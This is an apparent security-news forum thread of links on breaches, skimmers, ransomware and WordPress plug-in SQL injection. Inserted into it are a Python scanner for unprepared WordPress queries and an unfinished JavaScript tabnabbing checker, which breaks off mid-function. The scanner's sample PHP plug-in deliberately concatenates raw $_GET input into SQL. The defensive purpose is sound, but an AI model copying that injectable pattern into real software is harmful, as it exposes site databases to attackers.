Info: Severity: medium
https://github.com/twbs/bootstrap/issues/20184
Info: Severity: medium
https://github.com/twbs/bootstrap/issues/20184
1 vulnerable library detected
polonus (volunteer 3rd party cold reconnaissance website security analyst and website error-hunter)
P.S. Just fiddle a bit around and via cache data you'll get at:
https://webcache.googleusercontent.com/search?q=cache:9hT4lE0DjLUJ:www.smkmuhkandanghaur.sch.id/assets/bower_components/Ionicons/src/+&cd=2&hl=pl&ct=clnk&gl=us&client=avast
Damian
-
FBI Releases Warning on Sextortion Scams Targeting Teenagers
https://www.bleepingcomputer.com/news/security/fbi-releases-warning-on-sextortion-scams-targeting-teenagers/
-
Beware of Fake Microsoft OneNote Audio Note Phishing Emails
https://www.bleepingcomputer.com/news/security/beware-of-fake-microsoft-onenote-audio-note-phishing-emails/
-
962 Magento webshops hit through formjacking:
Re: https://www.bleepingcomputer.com/news/security/automated-magecart-campaign-hits-over-960-breached-stores/
Re: https://gist.github.com/gwillem/5d936f5a84837d5c1dcb488ce256294a (the decoded script)
Webshop owners and store-site maintainers should scan here: https://www.magereport.com/scan/
Often the cause of this is sloppy update & patch routines for both Magento CMS and themes and plug-ins.
polonus
-
25 Million Android Phones Infected.
Is your Whatsapp kicking up adverts? You are probably being infected.
Read: https://www.forbes.com/sites/thomasbrewster/2019/07/10/25-million-android-phones-infected-with-malware-that-hides-in-whatsapp/
polonus
-
Hackers Infect Pale Moon Archive Server With a Malware Dropper
https://www.bleepingcomputer.com/news/security/hackers-infect-pale-moon-archive-server-with-a-malware-dropper/
-
Sad news
Bye bye
<?php
echo "# ZeuS Tracker has been discontinued on Jul 8th, 2019";
exit();
?>
polonus
-
Avast researchers find apparent Android app scam
https://blog.avast.com/avast-researcher-finds-apparent-android-app-scam
-
FBI Releases Master Decryption Keys for GandCrab Ransomware
https://www.bleepingcomputer.com/news/security/fbi-releases-master-decryption-keys-for-gandcrab-ransomware/
-
Twitter Can be Tricked Into Showing Misleading Embedded Links
https://www.bleepingcomputer.com/news/security/twitter-can-be-tricked-into-showing-misleading-embedded-links/
-
Spamhaus considers Cloudflare a privileged botnet-server hoster.
Cloudflare listed as the number 1 hoster of C&C servers.
https://www.spamhaus.org/news/article/785/spamhaus-botnet-threat-update-q2-2019
polonus
-
Spamhaus considers Cloudflare a privileged botnet-server hoster.
Cloudflare listed as the number 1 hoster of C&C servers.
https://www.spamhaus.org/news/article/785/spamhaus-botnet-threat-update-q2-2019
polonus
This isn't particularly surprising when you consider just how big Cloudflare is.
As I use uMatrix (and uBlock Origin) in my Firefox browsers, I see just how many sites have connections to Cloudflare.
Though like other hosting services I would be expecting them to be taking positive action to prevent this type of action. I guess we live in different worlds.
-
Re: https://www.wordfence.com/blog/2019/07/recent-wordpress-vulnerabilities-targeted-by-malvertising-campaign/
Advice: update and patch.
polonus
-
El Paso and Dayton Tragedy-Related Scams and Malware Campaigns
https://www.us-cert.gov/ncas/current-activity/2019/08/06/el-paso-and-dayton-tragedy-related-scams-and-malware-campaigns
-
El Paso and Dayton Tragedy-Related Scams and Malware Campaigns
https://www.us-cert.gov/ncas/current-activity/2019/08/06/el-paso-and-dayton-tragedy-related-scams-and-malware-campaigns (https://www.us-cert.gov/ncas/current-activity/2019/08/06/el-paso-and-dayton-tragedy-related-scams-and-malware-campaigns)
Since these tragedies are being used to raise funds for political purposes, why not exploit them to make money.
That's unfortunately the world we live in today. Where is my Commodore Vic 20 ???
-
An issue with your settings choices related to ads on Twitter
https://help.twitter.com/en/ads-settings
-
29 VPN services in the hands of 6 China-based organizations:
https://www.infosecurity-magazine.com/news/29-vpn-services-owned-by-six/
....a lot of these VPN apps harvest your personal data.
The top 97 VPN services are owned by just 23 parent companies.
polonus
-
Say Cheese: Ransomware-ing a DSLR Camera
https://research.checkpoint.com/say-cheese-ransomware-ing-a-dslr-camera/
-
Back-to-Back Campaigns: Neko, Mirai, and Bashlite Malware Variants Use Various Exploits to Target Several Routers, Devices
https://blog.trendmicro.com/trendlabs-security-intelligence/back-to-back-campaigns-neko-mirai-and-bashlite-malware-variants-use-various-exploits-to-target-several-routers-devices/
-
Google guru shows how WinXP-era text code grants total control
https://www.theregister.co.uk/2019/08/13/windows_notepad_flaw/
-
Microsoft warns Windows 10 users to update immediately
https://www.cnn.com/2019/08/14/tech/windows-10-microsoft-security-update-trnd/index.html (https://www.cnn.com/2019/08/14/tech/windows-10-microsoft-security-update-trnd/index.html)
-
HTTP/2 Denial of Service Advisory
https://github.com/Netflix/security-bulletins/blob/master/advisories/third-party/2019-002.md
https://www.kb.cert.org/vuls/id/605641/
-
Security Bulletin: NVIDIA GPU Display Driver - August 2019
https://nvidia.custhelp.com/app/answers/detail/a_id/4841
-
BEC Scam Costing Almost US$11 Million Leads to FBI Arrest of Nigerian Businessman
https://www.trendmicro.com/vinfo/us/security/news/cybercrime-and-digital-threats/bec-scam-costing-almost-us-11-million-leads-to-fbi-arrest-of-nigerian-businessman
-
One down, 1000 more to go.
-
Almost every day now new insecurity is detected with plug-ins on the PHP-driven WordPress CMS.
Please folks, update, patch, disable user enumeration and set directory listing to disabled.
Use some form of validation like CSP (Content Security Policy header);
also scan for SQL and DOM-XSS vulnerabilities in the plug-in code.
Read: 1.5 million users could be affected: https://www.fortinet.com/blog/threat-research/wordpress-plugin-sql-injection-vulnerability.html
also: https://www.wordfence.com/blog/2019/08/malicious-wordpress-redirect-campaign-attacking-several-plugins/
polonus
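Scanning plug-in code for SQL injection, as advised above, mostly comes down to spotting $wpdb queries that are built from request input without $wpdb->prepare(). The Python below is an added example, not code from the post or from any named plug-in or scanner: a deliberately simple statement-level check that assumes WordPress's usual $wpdb API and flags unprepared queries, with request superglobals rated "high" and other interpolated variables rated "review". The PHP sample it runs on is constructed for the demonstration.

```python
import re

WPDB_CALL = re.compile(r"\$wpdb->(query|get_results|get_var|get_row|get_col)\s*\(")
PREPARED = re.compile(r"\$wpdb->prepare\s*\(")
REQUEST_INPUT = re.compile(r"\$_(GET|POST|REQUEST|COOKIE)\b")
# Any variable other than $wpdb itself (which is used for the table prefix).
OTHER_VAR = re.compile(r"\$(?!wpdb\b)[A-Za-z_]\w*")


def statements(php: str):
    """Yield (first_line_no, text) for each ';'-terminated statement.
    Deliberately naive: a ';' inside a string literal also ends a statement."""
    buf, start = [], None
    for lineno, line in enumerate(php.splitlines(), 1):
        if start is None and line.strip():
            start = lineno
        buf.append(line)
        if ";" in line:
            yield start, "\n".join(buf)
            buf, start = [], None


def audit_wpdb(php: str) -> list:
    """Flag $wpdb queries that build SQL without $wpdb->prepare()."""
    findings = []
    for lineno, stmt in statements(php):
        call = WPDB_CALL.search(stmt)
        if call is None:
            continue
        method = call.group(1)
        argument = stmt[call.end():]        # text after the opening parenthesis
        if PREPARED.search(argument):
            continue                        # parameterised: placeholders bind the values
        if REQUEST_INPUT.search(argument):
            findings.append((lineno, "high",
                             f"{method}() concatenates request input into SQL without $wpdb->prepare()"))
        elif OTHER_VAR.search(argument):
            findings.append((lineno, "review",
                             f"{method}() interpolates a variable into SQL; confirm it is validated or use $wpdb->prepare()"))
    return findings


# Constructed sample in the style of a plug-in; not code from any real plug-in.
SAMPLE_PLUGIN = r"""<?php
function gallery_lookup() {
    global $wpdb;
    $rows = $wpdb->get_results(
        "SELECT * FROM {$wpdb->prefix}gallery WHERE id = " . $_GET['id']
    );
    $safe = $wpdb->get_results(
        $wpdb->prepare("SELECT * FROM {$wpdb->prefix}gallery WHERE id = %d", $_GET['id'])
    );
    $limit = get_option('gallery_limit');
    $recent = $wpdb->get_results("SELECT * FROM {$wpdb->prefix}gallery LIMIT $limit");
    $count = $wpdb->get_var("SELECT COUNT(*) FROM {$wpdb->prefix}gallery");
}
"""

if __name__ == "__main__":
    for lineno, severity, message in audit_wpdb(SAMPLE_PLUGIN):
        print(f"line {lineno}: [{severity}] {message}")
```

On the sample it reports the query at line 4 as high (raw $_GET concatenated into SQL) and the one at line 11 for review ($limit comes from an option, which an administrator controls, so it needs a look but is not request input); the prepared query and the constant COUNT query pass. A regex check like this is a triage aid, not a proof of safety: it cannot follow values through function calls, so anything it rates "review" still needs a human reading the code.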
-
List of affected WP plug-ins:
For those who don't want to search further, it concerns this list:
WordPress.AJDGSolutions.AdRotate.SQL.Injection
WordPress.Adenion.Blog2Social.SQL.Injection
WordPress.Icegram.EmailSubscribers.SQL.Injection
WordPress.WPEverest.EverestForms.SQL.Injection
WordPress.FolioVision.FlowplayerVideoPlayer.SQL.Injection
WordPress.Impress.Give.SQL.Injection
WordPress.Imagely.NextGENGallery.SQL.Injection
WordPress.10Web.PhotoGallery.SQL.Injection
WordPress.Sygnoos.PopupBuilder.SQL.Injection
polonus
-
Cybersecurity Advisory Notice
https://www.foxitsoftware.com/support/security-advisories.php
-
Revealed: How a secret Dutch mole aided the U.S.-Israeli Stuxnet cyberattack on Iran
https://www.yahoo.com/news/revealed-how-a-secret-dutch-mole-aided-the-us-israeli-stuxnet-cyber-attack-on-iran-160026018.html
-
41% of Consumers Still Use Unsupported or Nearly Expired Operating Systems
https://usa.kaspersky.com/about/press-releases/2019_consumers-still-use-unsupported-and-near-end-of-life-os
-
41% of Consumers Still Use Unsupported or Nearly Expired Operating Systems
https://usa.kaspersky.com/about/press-releases/2019_consumers-still-use-unsupported-and-near-end-of-life-os
My surprise is that it is only 41% :)
-
41% of Consumers Still Use Unsupported or Nearly Expired Operating Systems
https://usa.kaspersky.com/about/press-releases/2019_consumers-still-use-unsupported-and-near-end-of-life-os
My surprise is that it is only 41% :)
And we belong to those 41% ;D
-
41% of Consumers Still Use Unsupported or Nearly Expired Operating Systems
https://usa.kaspersky.com/about/press-releases/2019_consumers-still-use-unsupported-and-near-end-of-life-os (https://usa.kaspersky.com/about/press-releases/2019_consumers-still-use-unsupported-and-near-end-of-life-os)
My surprise is that it is only 41% :)
And we belong to those 41% ;D
Happy to be part of the 59%. :)
-
Spammers abuse Snowden's new book to spread Emotet malware trojan downloader infections.
Read: https://blog.malwarebytes.com/botnets/2019/09/emotet-malspam-campaign-uses-snowdens-new-book-as-lure/
We cannot tell for sure whether such malware spam campaigns come from average cybercriminals or with the blessing of some state actors;
consider: https://www.theverge.com/2019/9/17/20870706/edward-snowden-book-us-government-justice-lawsuit-profits-release
Think of groups like APT28, DarkMatter and other groups that operate with government consent of sorts.
Analyzing one example from South Africa in Afrikaans & US American English:
See: https://any.run/report/821e3f454016615879c524b7b2604c21f783b062f4c9756993a2be75e08d8820/ea4d097e-bc52-4ac1-bcc1-6acee3cd47ee
Other information on this malware campaign:
https://isc.sans.edu/diary/More+Malspam+pushing+Emotet+malware/23083
on forwarding port: https://www.google.com/search?client=avast&ei=RFyLXfWLHYLMwQKU6Z-gAw&q=port+7080+used+for+malware&oq=port+7080+used+for+malware&gs_l=psy-ab.12..33i160.526.2228..3679...0.2..2.786.4145.2-3j5-3j2......0....1..gws-wiz.......0i71j0i22i30.S9TZ0mtzXLA&ved=0ahUKEwj1vY_F--vkAhUCZlAKHZT0BzQQ4dUDCAs
detection: https://www.virustotal.com/gui/url/cfe00e649b459de311f14bc751439f6ada69b4462f4251399b3d250447791bfa/detection
On infesting sw-cp server: https://toolbar.netcraft.com/site_report?url=http%3A%2F%2Feuve264289.serverprofi24.de%2F
On the zero-day being abused: https://blogs.cisco.com/security/plesk-0-day-targets-web-servers
On that particular launching IP: https://www.shodan.io/host/62.75.171.248
polonus (volunteer 3rd party cold recon website security analyst and website error-hunter)
-
Google Chrome Keystone is modifying /var symlink on non SIP Macs causing Boot Issues
https://mrmacintosh.com/google-chrome-keystone-is-modifying-var-symlink-on-non-sip-macs-causing-boot-issues/
https://support.google.com/chrome/thread/15235262
-
Malicious HTA node.js malware, not just for spammers.
Cisco & Microsoft warn users.
See: https://www.trustedsec.com/2015/07/malicious-htas/
Re: -https://github.com/InQuest/malware-samples/tree/master/2019-04-Malicious-HTA-file
and read: https://www.cybersecurity-help.cz/blog/698.html
polonus
-
Malicious HTA node.js malware, not just for spammers.
Cisco & Microsoft warn users.
See: https://www.trustedsec.com/2015/07/malicious-htas/
Re: -https://github.com/InQuest/malware-samples/tree/master/2019-04-Malicious-HTA-file
and read: https://www.cybersecurity-help.cz/blog/698.html
polonus
Divergent: "Fileless" NodeJS Malware Burrows Deep Within the Host
https://blog.talosintelligence.com/2019/09/divergent-analysis.html
https://www.virustotal.com/gui/file/47b5dac9152220fbbf122eff89ac93d42e9196f5ab665a2a6d99594246ab8a81/detection
https://www.virustotal.com/gui/file/062688aec1bdf1208bd72a77696e1fbcd1076f54bd6e59141ed12b6f8e3ba32c/detection
-
Security Attacks via Malicious QR Codes:
Read: https://resources.infosecinstitute.com/security-attacks-via-malicious-qr-codes/
Various generators for various purposes:
https://www.the-qrcode-generator.com/
http://goqr.me/
http://www.qr-code-generator.com/
http://www.qrstuff.com/
https://scan.me/qr-code-generator
A QR code has an unlimited lifespan; phishing is the main attack vector for malicious QR codes.
Info credits for the above information go to Infosec's Pavitra Shankdhar.
polonus
-
Comodo Forums Breached, Data of Over 170,000 Users Up for Grabs
https://www.bleepingcomputer.com/news/security/comodo-forums-breached-data-of-over-170-000-users-up-for-grabs/
-
Comodo Forums Breached, Data of Over 170,000 Users Up for Grabs
https://www.bleepingcomputer.com/news/security/comodo-forums-breached-data-of-over-170-000-users-up-for-grabs/
Some of us know first hand that no forum is ever 100% safe. Actually, nothing is, which is why we need security.
-
Cybercrime is everywhere, read about Predator the Thief, a malware stealer, here:
https://www.fortinet.com/blog/threat-research/predator-the-thief-new-routes-delivery.html (info credits go to Fortinet).
One of the launch IPs for this: https://www.shodan.io/host/18.219.205.14
Not detected as such at VT: https://www.virustotal.com/gui/url/b7cbb3ffcdd2172d17328a0e0fd45a67844e2d557c91cf35284339e064b3fa57/details
Stumbled upon this malbot here: http://cybercrime-tracker.net/index.php
where one can meet more notorious members of this unwelcome family ;)
polonus
-
Russian hackers modify Chrome and Firefox to track secure web traffic
The perpetrators may have Russian government support.
https://www.engadget.com/2019/10/06/russian-hackers-modify-chrome-firefox/?guccounter=1&guce_referrer=aHR0cHM6Ly9pdGF2aXNlbi5uby8yMDE5LzEwLzA3L3J1c3Npc2tlLWhhY2tlcmUtaGFyLW1vZGlmaXNlcnQtY2hyb21lLW9nLWZpcmVmb3gtbXVsaWdlbnMtbWVkLXJ1c3Npc2tlLW15bmRpZ2hldGVyLWktcnlnZ2VuLw&guce_referrer_sig=AQAAANa41GseYgc442zehSlhCKHRYMthxO69f_j7L_6bLGUjRkrtO2FboKmw9jaUShXYfGlssPH8xO-5p1GqSkHuknWQ3bVOVIHv0k1HIaW5kNpN2G8PDe8wRwy5eoqb-snsi9Kgqvi4HDLVA9ZO2YhI2H8t_w495npwxMPsuyE2kMZd
-
750 end-of-life servers removed from the Tor network by the Tor Project.
Read: https://blog.torproject.org/removing-end-life-relays-network
Why is this important?
On the importance of using IoCs for Tor C2, read:
https://socprime.com/en/blog/wannacry-no-more-ransomware-worm-iocs-tor-c2-and-technical-analysis-siem-rules/
C&C servers are the malware's online sockpuppets:
https://securityaffairs.co/wordpress/89237/malware/mirai-botnet-tor-c2.html &
https://www.microsoft.com/security/blog/2014/03/05/sefnits-tor-botnet-cc-details/
Malware abuse with tor-loc
https://www.symantec.com/security-center/writeup/2013-090611-2333-99
for Mevade backdoor e.v.
Tor should get an enhanced security effort: a continuous drive to protect it, to keep Tor and the general user safer and more secure.
(info credits go to #sockpuppet)
polonus
-
Magecart malware, still alive and kicking: brought to your webshop by 15 active cybercrime groups. ::) :o
Read: https://www.theregister.co.uk/2019/10/04/magecart/
Check whether your Magento shop is vulnerable here: https://www.magereport.com/
polonus
-
Vulnerability in iTunes and iCloud allowed Windows PC ransomware infection
https://9to5mac.com/2019/10/11/vulnerability-in-itunes/
-
Vulnerability in iTunes and iCloud allowed Windows PC ransomware infection
https://9to5mac.com/2019/10/11/vulnerability-in-itunes/
It's already been patched. Update to fix the vulnerability.
-
WordPress 5.2.4 Security Release
https://wordpress.org/news/2019/10/wordpress-5-2-4-security-release/
-
Hacker Breached Servers Belonging to Multiple VPN Providers
https://www.bleepingcomputer.com/news/security/hacker-breached-servers-belonging-to-multiple-vpn-providers/
https://thehackernews.com/2019/10/nordvpn-data-breach.html
-
Hi Pondus,
I sense we have to prepare for some negative VPN news breaking.
Many such services have now outgrown their initial possibilities,
and we are soon going to meet the shortcomings. At least i.m.h.o.
Hope I am wrong,
polonus aka Damian
-
Again Magecart infections via POI: https://sansec.io/labs/2018/10/23/magecart-extension-0days/
Here about vendors that were hit: https://www.theregister.co.uk/2018/11/02/kitronik_online_shop_malware/
So, hop over to https://www.magereport.com/ and scan your Magento shop CMS.
polonus
-
L.S.
When you have read the link content in the previous post, you now know about POI (PHP Object Injection) and one of its attack vectors. If you want to know about further attack vectors, they are introduced here: http://www.tecapi.com/public/relative-vulnerability-rating-gui.jsp and then here: http://www.tecapi.com/public/rvr-view-attack-vector-gui.jsp?antiCsrfToken=null&attackVectorId=10 and see why these attack vectors are critical.
Scan your code for the flaws that make it susceptible to POI.
pol
-
7 million Adobe Creative Cloud accounts exposed to the public
https://www.comparitech.com/blog/information-security/7-million-adobe-creative-cloud-accounts-exposed-to-the-public/
-
Maxthon Browser for Windows - Unquoted Search Path and Potential Abuses (CVE-2019-16647)
https://safebreach.com/Post/Maxthon-Browser-for-Windows-Unquoted-Search-Path-and-Potential-Abuses-CVE-2019-16647
-
Nasty PHP7 remote code execution bug exploited in the wild on Nginx webservers
through a specially crafted URL, read:
https://www.zdnet.com/article/nasty-php7-remote-code-execution-bug-exploited-in-the-wild/
See the PoC: https://github.com/neex/phuip-fpizdam
Again, non-validated PHP is the can of worms it always has been.
You could open this Pandora's box before you are aware of it.
polonus
-
Oops — Adobe leaves 7.5 million Creative Cloud accounts exposed
https://thenextweb.com/security/2019/10/28/oops-adobe-leaves-7-5-million-creative-cloud-accounts-exposed/
-
Oops — Adobe leaves 7.5 million Creative Cloud accounts exposed
https://thenextweb.com/security/2019/10/28/oops-adobe-leaves-7-5-million-creative-cloud-accounts-exposed/
See Reply #5994. ;)
-
Notice of Potential Payment Card Incident
http://www.krystal.com/security/
-
Network Solutions - Important Security Information
https://notice.networksolutions.com/
-
A Major Google Chrome Security Flaw Was Discovered. If You Use Chrome, Update Right Now
https://www.inc.com/minda-zetlin/chrome-browser-security-flaw-vulnerability-update-google-bug-bounty.html
v78.0.3904.70 needs to be updated to v78.0.3904.87
-
A Major Google Chrome Security Flaw Was Discovered. If You Use Chrome, Update Right Now
https://www.inc.com/minda-zetlin/chrome-browser-security-flaw-vulnerability-update-google-bug-bounty.html
v78.0.3904.70 needs to be updated to v78.0.3904.87
That article is from Aug 30th, is it still an issue?
-
A Major Google Chrome Security Flaw Was Discovered. If You Use Chrome, Update Right Now
https://www.inc.com/minda-zetlin/chrome-browser-security-flaw-vulnerability-update-google-bug-bounty.html
v78.0.3904.70 needs to be updated to v78.0.3904.87
That article is from Aug 30th, is it still an issue?
https://mashable.com/article/google-chrome-halloween-zero-day-exploit/
-
A Major Google Chrome Security Flaw Was Discovered. If You Use Chrome, Update Right Now
https://www.inc.com/minda-zetlin/chrome-browser-security-flaw-vulnerability-update-google-bug-bounty.html
v78.0.3904.70 needs to be updated to v78.0.3904.87
That article is from Aug 30th, is it still an issue?
https://mashable.com/article/google-chrome-halloween-zero-day-exploit/
Okay, thanks.
-
Second zero-day still unpatched by Google Chrome:
https://securelist.com/chrome-0-day-exploit-cve-2019-13720-used-in-operation-wizardopium/94866/
It is a so-called watering-hole exploit being abused.
-http://code.jquery.cdn.behindcorona.com/ has already been taken down.
pol
-
More on the cat-and-mouse game between Shodan and users.
http://romcheckfail.com/blocking-shodan-keeping-shodan-io-in-the-dark-from-scanning/
Shodan is definitely a useful tool, and will help admins who don't realize what is exposed to the internet find out their weak points. It is also very useful for vulnerability assessments and getting metrics about services from the internet as a whole. But it is also, like all good things, used by people who want to exploit the data within for personal gain or entertainment.
There are literally hundreds of thousands of interesting and exploitable items on Shodan, just don't be one of them.
Quote credits go to Mike Hiltz
polonus
-
Hackers Breach ZoneAlarm's Forum Site — Outdated vBulletin to Blame
https://thehackernews.com/2019/11/zonealarm-forum-data-breach.html
-
New NextCry Ransomware Encrypts Data on NextCloud Linux Servers
https://www.bleepingcomputer.com/news/security/new-nextcry-ransomware-encrypts-data-on-nextcloud-linux-servers/
-
Visa warns webshops against code that steals credit card data:
Read: https://usa.visa.com/dam/VCOM/global/support-legal/documents/pfd-identifies-new-javascript-skimmer.pdf
This JavaScript skimmer malware is called "Pipka"* by Visa (* an ugly word, e.g. in Polish (diminutive),
and you won't find the expression in a Polish dictionary).
It is the first malcode of its kind that removes itself from compromised websites (HTML).
polonus
-
Three minor Microsoft flaws can easily add up to one big one:
https://www.f5.com/labs/articles/threat-intelligence/how-three-low-risk-vulnerabilities-become-one-high-24995
Better safe than sorry. Mitigate those risks you run.
polonus
-
‘Magic: The Gathering’ game maker exposed 452,000 players’ account data
https://techcrunch.com/2019/11/16/magic-the-gathering-wizards-data-exposure/
-
Macy's Customer Payment Info Stolen in Magecart Data Breach
https://www.bleepingcomputer.com/news/security/macys-customer-payment-info-stolen-in-magecart-data-breach/
-
Exposed database left terabyte of travelers' data open to the public
https://www.cnet.com/news/exposed-database-left-terabyte-of-travelers-data-open-to-the-public/
https://www.vpnmentor.com/blog/report-accorhotels-leak/
-
What to do about unblockable web trackers?
Read: https://www.theregister.co.uk/2019/11/21/ublock_origin_firefox_unblockable_tracker/
Firefox has thwarted this new apparently unblockable tracker.
For Chrome, there is no DNS API available, and so no easy way to detect this.
As web tracking is a major part of Google's core business, they want to go forward with this,
allowing advertisers to create unique IDs for every ad impression they serve, information
that could then be associated with individual users.
Ads could contain malware, so I block with uBlock Origin and uMatrix in the Cliqz Internet browser
(a particular Firefox private browser flaw).
Surveillance capitalism by Facebook and Google goes over the top,
according to Amnesty International, and in its effects is threatening human rights.
Further background information:
Electronic Frontier Foundation:
Surveillance Self-Defense Guide
https://ssd.eff.org/
Book: Fake It! by Steffan Heuer & Pernille Tranberg
Protect your digital identity
https://www.digital-selfdefense.com/
polonus aka Damian (volunteer 3rd party cold recon website security analyst and website error-hunter)
P.S. A solution for chrome lies in these less known settings: https://support.google.com/chrome/answer/2364824
-
Edenred announces malware infection
https://www.globenewswire.com/news-release/2019/11/22/1951181/0/en/Edenred-announces-malware-infection.html
-
Bulletin: HPE SAS Solid State Drives - Critical Firmware Upgrade Required for Certain HPE SAS Solid State Drive Models to Prevent Drive Failure at 32,768 Hours of Operation
https://support.hpe.com/hpsc/doc/public/display?docId=emr_na-a00092491en_us
-
12,000 phishing attacks by state actors during the last three months.
Google detected and warned about such attacks:
https://www.blog.google/technology/safety-security/threat-analysis-group/protecting-users-government-backed-hacking-and-disinformation/
Android attacks performed by state hackers are also being made public, to make end users more aware and have them seek protection.
Found to be most active: US state actors and state actors from Pakistan.
polonus
-
Magento Marketplace Security Update
https://magento.com/blog/magento-news/magento-marketplace-security-update
-
Facebook and Twitter say hundreds of users accidentally gave improper access to personal data through third-party apps
https://www.cnbc.com/2019/11/25/facebook-and-twitter-says-users-gave-improper-access-to-personal-data.html
-
Mixcloud data breach exposes over 20 million user records
https://techcrunch.com/2019/11/29/mixcloud-data-breach/
https://blog.mixcloud.com/2019/11/30/mixcloud-security-notice
-
Someone is Watching you!
User Privacy Under Relentless Attack by Trackers Following Every Click and Purchase
https://www.eff.org/press/releases/eff-report-exposes-explains-big-techs-personal-data-trackers-lurk-social-media
-
20 VPS providers to shut down on Monday, giving customers two days to save their data
https://www.zdnet.com/article/20-vps-providers-to-shut-down-on-monday-giving-customers-two-days-to-save-their-data/
-
Caution! Ryuk Ransomware decrypter damages larger files, even if you pay
https://blog.emsisoft.com/en/35023/bug-in-latest-ryuk-decryptor-may-cause-data-loss/
-
https://blog.malwarebytes.com/threat-analysis/2019/12/hundreds-of-counterfeit-online-shoe-stores-injected-with-credit-card-skimmer/
So scan every webshop with Magento under 1.9.4.2 & PHP under 5.6.40 here: https://www.magereport.com/
In case of plenty of vulnerabilities, do not go there, and refrain from ever buying fake goods or being scammed out of your money.
If others cannot protect us, we have to fend for ourselves. Forewarned = forearmed.
polonus
Just a random webshop you have to shun because it is insecure: https://www.magereport.com/scan/?s=https://www.sarezalando.com/
Scan results say HIGH RISK website -> not patched, not installed, unprotected and unmaintained (on purpose as we find out now).
Damian
P.S. Not flagged at VT: https://www.virustotal.com/gui/ip-address/141.105.68.82/details
Probably coming from Russia (RBN, "Russian Business Network" website), not yet on Dr. Web's malicious websites list.
-
LifeLabs Data Breach Exposes Personal Info of 15 Million Customers
https://www.bleepingcomputer.com/news/security/lifelabs-data-breach-exposes-personal-info-of-15-million-customers/
https://customernotice.lifelabs.com/
-
Just watching an infested ad is enough to get infected.
Social engineering does the rest (if you fall for it or aren't using a decent blocker)
Visiting smut sites and then a fake smut site with a malware installer posing as a video update will infest you.
Re: https://blog.malwarebytes.com/threat-analysis/2019/12/spelevo-exploit-kit-debuts-new-social-engineering-trick/
polonus
-
Report: 267 million Facebook users IDs and phone numbers exposed online
https://www.comparitech.com/blog/information-security/267-million-phone-numbers-exposed-online/
-
Cyberattack hit computers of the Maastricht University in the Netherlands.
Clop ransomware, an AES CryptoMix variant, launched by malcreants hiding behind a Protonmail address.
Newer variants of the Clop ransomware will also disable AV protection.
The word clop comes from the word "Klop", Клоп in Russian, which is a term for a sort of bloodsucking bedbug,
but in this case it should be taken more to mean an equivalent of the technical term "bug".
We are waiting for a decryptor, but if AES is professionally applied at full strength, it is nearly uncrackable and cannot be defeated.
Infection methods are:
Spam email attachments or hyperlinks;
Insecure RDP connections;
Compromised or hacker-designed websites;
Re-packed installers;
Keygens, cracks, and other executables;
Exploit kits, etc.
Authorities have been warning about this dangerous web threat for months now.
And it took Maastricht University by surprise just before Christmas Eve.
Info credits above go to: luntrus
polonus
-
Malcreants (cybercriminal ransomware developers) do not like their adversaries; they really hate them.
Read: https://www.bbc.co.uk/news/resources/idt-sh/hated_and_hunted_the_computer_virus_malware_ransomware_cracker
See for instance how widely this Syrk ransomware has spread:
https://maltiverse.com/search;query=gr9wgs94fg5sb3y8l.000webhostapp.com;page=1;sort=query_score
polonus
-
Attackers are actively on the lookout for vulnerable Citrix servers.
Read: https://support.citrix.com/article/CTX267027 (vulnerability)
80,000 vulnerable servers worldwide:
https://www.ptsecurity.com/ww-en/about/news/citrix-vulnerability-allows-criminals-to-hack-networks-of-80000-companies/
Hacker activity: https://twitter.com/GossiTheDog/status/1214892555306971138
Confirmed here: https://isc.sans.edu/forums/diary/A+Quick+Update+on+Scanning+for+CVE201919781+Citrix+ADC+Gateway+Vulnerability/25686/
Mitigation proposals (there is no patch available as yet): https://support.citrix.com/article/CTX267679
polonus
-
Beware of Amazon Prime Support Scams in Google Search Ads
https://www.bleepingcomputer.com/news/security/beware-of-amazon-prime-support-scams-in-google-search-ads/
-
On many sites the Google Translate widget could mean a problem, allowing potential attacks via 'window.opener',
read: https://webhint.io/docs/user-guide/hints/hint-disown-opener/#why-is-this-important (security problem)
Where we have seen this:
disown-opener: 65 hints
hint #1: '<a class="goog-logo-link" href="-https://translat … -right: 3px" alt="Google Translate">Translate</a>' should have 'rel' attribute value include 'noopener' and 'noreferrer' keywords.
detected on -https://www.ninefornews … nos-fake-news-etc
<a class="goog-logo-link" href="-https://translate.google.com" target="_blank">
Also cdn.taboola dot com adware found on that page: https://www.joesandbox.com/analysis/152773/0/html
polonus (volunteer 3rd party cold recon website security analyst and website error-hunter)
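The disown-opener hint quoted above can be checked mechanically. The following is an added example (not polonus's post and not webhint's own code): it scans a constructed HTML snippet, whose first anchor mirrors the Google Translate widget markup above, for off-site target="_blank" links lacking rel="noopener noreferrer", and shows the corrected tag. The page URL and the other sample links are assumptions.

```javascript
// Added example, not code from the forum post or from webhint: a minimal
// checker modelled on the "disown-opener" hint quoted above. A link opened
// with target="_blank" gives the new page a window.opener reference; without
// rel="noopener" that page can navigate the opening tab (reverse tabnabbing),
// and without rel="noreferrer" it also receives the opener's URL as Referer.

// Parse the attributes of a single opening tag into a lowercase-keyed object.
function parseAttributes(tag) {
  const attrs = {};
  const re = /([A-Za-z_:][-A-Za-z0-9_:.]*)\s*=\s*(?:"([^"]*)"|'([^']*)'|([^\s"'>]+))/g;
  let m;
  while ((m = re.exec(tag)) !== null) {
    const value = m[2] !== undefined ? m[2] : m[3] !== undefined ? m[3] : (m[4] || "");
    attrs[m[1].toLowerCase()] = value;
  }
  return attrs;
}

// Split a rel attribute into its keyword tokens.
function relTokens(value) {
  return new Set((value || "").toLowerCase().split(/\s+/).filter(Boolean));
}

// A link is cross-origin when its resolved origin differs from the page's.
// Unparsable hrefs are treated as cross-origin (the conservative choice).
function isCrossOrigin(href, pageUrl) {
  try {
    return new URL(href, pageUrl).origin !== new URL(pageUrl).origin;
  } catch (e) {
    return true;
  }
}

// Scan raw HTML for <a target="_blank"> links pointing off-site that lack
// "noopener" and/or "noreferrer"; returns one finding per offending anchor.
// Same-origin links are skipped here, since the risk is a foreign page.
function findDisownOpenerHints(html, pageUrl) {
  const findings = [];
  const anchorRe = /<a\b[^>]*>/gi;
  let m;
  while ((m = anchorRe.exec(html)) !== null) {
    const attrs = parseAttributes(m[0]);
    if ((attrs.target || "").toLowerCase() !== "_blank") continue;
    const href = attrs.href || "";
    if (!isCrossOrigin(href, pageUrl)) continue;
    const rel = relTokens(attrs.rel);
    const missing = ["noopener", "noreferrer"].filter((k) => !rel.has(k));
    if (missing.length > 0) findings.push({ tag: m[0], href, missing });
  }
  return findings;
}

// Return the anchor tag with "noopener noreferrer" merged into any existing rel value.
function fixAnchor(tag) {
  const rel = relTokens(parseAttributes(tag).rel);
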